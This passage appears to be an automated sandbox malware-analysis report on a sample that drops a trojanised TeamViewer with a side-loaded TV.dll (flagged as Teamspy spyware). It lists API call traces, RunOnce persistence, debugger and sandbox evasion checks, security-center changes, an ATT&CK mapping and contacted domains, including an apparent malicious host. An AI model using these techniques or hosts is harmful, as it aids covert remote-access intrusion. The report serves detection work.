Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF37D0 QueryServiceConfigA,QueryServiceConfigA,GetProcessHeap,HeapAlloc,QueryServiceConfigA,ChangeServiceConfigA,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe
Source: C:\Users\user\Desktop\77Etc0bR2v.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_004FB7F9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_004DC9D6
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_00500C6A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_004FFF68
Source: C:\Windows\System32\svchost.exe TID: 4668Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe TID: 3100Thread sleep count: 99 > 30
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe TID: 3100Thread sleep time: -49500s >= -30000s
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAFB0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_004FFF68
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: __EH_prolog3,GetAdaptersInfo,_malloc,GetAdaptersInfo,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: GetAdaptersInfo,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeProcess information queried: ProcessInformation
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_0040263E FindFirstFileA,
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF28B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_004BF3A9 __EH_prolog3,GetVolumeInformationW,FindFirstFileW,FindClose,FindFirstFileW,FindClose,GetVolumeInformationW,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_0050331C __EH_prolog3_catch,FindFirstFileW,GetLastError,__CxxThrowException@8,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF28B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF28B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAF2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose,
Source: svchost.exe, 00000005.00000002.524751408.000002B018262000.00000004.00000001.sdmpBinary or memory string: $@Hyper-V RAW
Source: svchost.exe, 00000005.00000002.510529267.000002B012C29000.00000004.00000001.sdmp, TeamViewer.exe, 00000006.00000003.281567558.0000000000BB8000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: svchost.exe, 00000009.00000002.509723909.000001E20B602000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: svchost.exe, 00000009.00000002.510137559.000001E20B640000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.510538467.000001D426444000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.510416688.0000024BA4E29000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Anti Debugging:

Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeOpen window title or class name: ollydbg
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeSystem information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAFB0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF2000 GetSecurityInfo,GetNamedSecurityInfoA,GetProcessHeap,HeapAlloc,CreateWellKnownSid,SetEntriesInAclA,SetSecurityInfo,SetNamedSecurityInfoA,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAFC1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_0051523A _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_00534A9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAFC1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_6EAFC1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion:

DLL side loading technique detected
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF5130 LogonUserW,GetLastError,CloseHandle,
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF3390 OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,GetProcessHeap,GetProcessHeap,HeapAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,ConvertSidToStringSidA,FreeSid,GetProcessHeap,HeapFree,CloseHandle,
Source: TeamViewer.exe, 00000006.00000002.526934910.0000000001100000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
Source: TeamViewer.exe, 00000006.00000002.526934910.0000000001100000.00000002.00020000.sdmpBinary or memory string: Progman
Source: TeamViewer.exe, 00000006.00000002.526934910.0000000001100000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
Source: TeamViewer.exe, 00000006.00000002.526934910.0000000001100000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
Source: TeamViewer.exe, 00000006.00000002.526934910.0000000001100000.00000002.00020000.sdmpBinary or memory string: Progmanlock
Source: TeamViewer.exe, 00000014.00000000.345802287.0000000000733000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWndThumbnailClassDV2ControlHostBaseBarTeamViewer_TitleBarWindowProgmanTVWidgetWin#32771teamviewerdebug.exeteamviewer.exeQuick Connect ButtonStartmenuTaskbarDesktopsidebar.exe\VarFileInfo\Translation\StringFileInfo\%04x%04x\FileDescription.exeOther applicationsSideBar_HTMLHostWindowSideBar_AppBarBulletBasicWindowTVWhiteboardOverlayWindowButtonEnableApplicationSelection: %1% (..\Server\WindowOberserver.cpp, 720)SelectAllWindows: %1%;%2% (..\Server\WindowOberserver.cpp, 751)SetSingleWindow (..\Server\WindowOberserver.cpp, 820)SessionEnded: %1% (..\Server\WindowOberserver.cpp, 827)SessionStart: %1%; type: %2% (..\Server\WindowOberserver.cpp, 910)HandleDesktopChanged: %1% (..\Server\WindowOberserver.cpp, 1017)Winlogonmap/set<T> too long
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,InvertRect,InvertRect,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,FrostCrashedWindow,FrostCrashedWindow,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,FrostCrashedWindow,FrostCrashedWindow,GetPrivateProfileIntA,wsprintfA,FrostCrashedWindow,FrostCrashedWindow,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: GetLocaleInfoA,_xtoa_s@20,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: _LcidFromHexString,GetLocaleInfoA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,
Source: C:\Windows\SysWOW64\svchost.exeCode function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,DestroyAcceleratorTable,DestroyAcceleratorTable,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,DestroyAcceleratorTable,DestroyAcceleratorTable,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0054B459 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDList,753CA680,lstrcat,lstrlen,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF8510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,FrostCrashedWindow,FrostCrashedWindow,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,FrostCrashedWindow,FrostCrashedWindow,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FrostCrashedWindow,FrostCrashedWindow,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,InvertRect,InvertRect,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
Source: svchost.exe, 0000000E.00000002.510485370.000001B2F323D000.00000004.00000001.sdmpBinary or memory string: "@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000E.00000002.510602015.000001B2F3302000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_00511D6F __EH_prolog3_catch,_memset,_memset,socket,WSAGetLastError,htonl,inet_addr,htons,WSAGetLastError,bind,bind,WSAGetLastError,Sleep,bind,listen,WSAGetLastError,select,WSAGetLastError,getsockname,WSAGetLastError,Sleep,__WSAFDIsSet,accept,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,WSAGetLastError,Sleep,GetTickCount,__WSAFDIsSet,WSAGetLastError,_strncmp,_strncmp,_strncpy,shutdown,Sleep,listen,Sleep,listen,WSAGetLastError,accept,Sleep,_memset,WSAGetLastError,_memset,select,_strncmp,

Mitre Att&ck Matrix

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Valid Accounts 2 | Windows Management Instrumentation 111 | DLL Side-Loading 11 | DLL Side-Loading 11 | Disable or Modify Tools 1 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1 |
| Default Accounts | Native API 1 | DLL Search Order Hijacking 2 | DLL Search Order Hijacking 2 | Deobfuscate/Decode Files or Information 1 | LSASS Memory | Account Discovery 1 | Remote Desktop Protocol | Screen Capture 1 | Exfiltration Over Bluetooth | Encrypted Channel 21 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | Service Execution 12 | Create Account 1 | Valid Accounts 2 | Obfuscated Files or Information 2 | Security Account Manager | File and Directory Discovery 3 | SMB/Windows Admin Shares | Clipboard Data 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Valid Accounts 2 | Access Token Manipulation 21 | Software Packing 1 | NTDS | System Information Discovery 36 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 14 | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | Cron | Windows Service 22 | Windows Service 22 | DLL Side-Loading 11 | LSA Secrets | Query Registry 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | Launchd | Registry Run Keys / Startup Folder 1 | Process Injection 12 | DLL Search Order Hijacking 2 | Cached Domain Credentials | Security Software Discovery 471 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
| External Remote Services | Scheduled Task | Startup Items | Registry Run Keys / Startup Folder 1 | Masquerading 12 | DCSync | Virtualization/Sandbox Evasion 22 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Valid Accounts 2 | Proc Filesystem | Process Discovery 2 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
| Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Virtualization/Sandbox Evasion 22 | /etc/passwd and /etc/shadow | System Owner/User Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |
| Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Access Token Manipulation 21 | Network Sniffing | Remote System Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact |
| Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Process Injection 12 | Input Capture | System Network Configuration Discovery 1 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop |

Behavior Graph

Behavior Graph ID: 483795
Sample: 77Etc0bR2v.bin
Startdate: 15/09/2021
Architecture: WINDOWS
Score: 80

Top-level signatures:
  • Multi AV Scanner detection for dropped file
  • Multi AV Scanner detection for submitted file

77Etc0bR2v.exe (started)
  • Dropped: C:\Users\user\AppData\...\TeamViewer.exe, PE32
  • Dropped: C:\Users\user\AppData\Roaming\...\TV.dll, PE32
  • Dropped: C:\Users\user\...\Teamviewer_Resource_ja.dll, PE32
  • Started: TeamViewer.exe, with signatures:
      • Tries to detect sandboxes and other dynamic analysis tools (window names)
      • Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
      • Creates processes via WMI
      • Contains functionality to detect sleep reduction / modifications

TeamViewer.exe (started)
  • DNS/IP: master15.teamviewer.com 185.188.32.25, 49746, 49747, 49748 TEAMVIEWER-ASDE Germany
  • DNS/IP: outnegorave.info 172.67.205.33, 443, 49752, 49755 CLOUDFLARENETUS United States
  • DNS/IP: 2 other IPs or domains
  • Signature: Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

svchost.exe (started)
  • Signature: Changes security center settings (notifications, updates, antivirus, firewall)
  • Started: MpCmdRun.exe, which started conhost.exe

14 other processes
  • DNS/IP: 127.0.0.1 unknown unknown
  • Signature: DLL side loading technique detected

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
77Etc0bR2v.exe | 38% | Virustotal |
77Etc0bR2v.exe | 11% | Metadefender |
77Etc0bR2v.exe | 38% | ReversingLabs | Win32.Trojan.Teamspy

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\TeamViewer\TV.dll | 27% | ReversingLabs | Win32.Trojan.SpywareX
C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | 0% | Metadefender |
C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll | 0% | Metadefender |
C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll | 0% | ReversingLabs |

Unpacked PE Files

Source | Detection | Scanner | Label
1.2.77Etc0bR2v.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen2
1.0.77Etc0bR2v.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Domains

No Antivirus matches

URLs


Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
outnegorave.info | 172.67.205.33 | true | false | | high
master15.teamviewer.com | 185.188.32.25 | true | false | | high
ping3.dyngate.com | unknown | unknown | false | | high

Contacted URLs


URLs from Memory and Binaries

                                                                                                        unknown
                                                                                                        https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000C.00000002.310813443.000002A41623D000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://www.teamviewer.com/download/version_5x/TeamViewerQS.exe77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmpfalse
                                                                                                              high
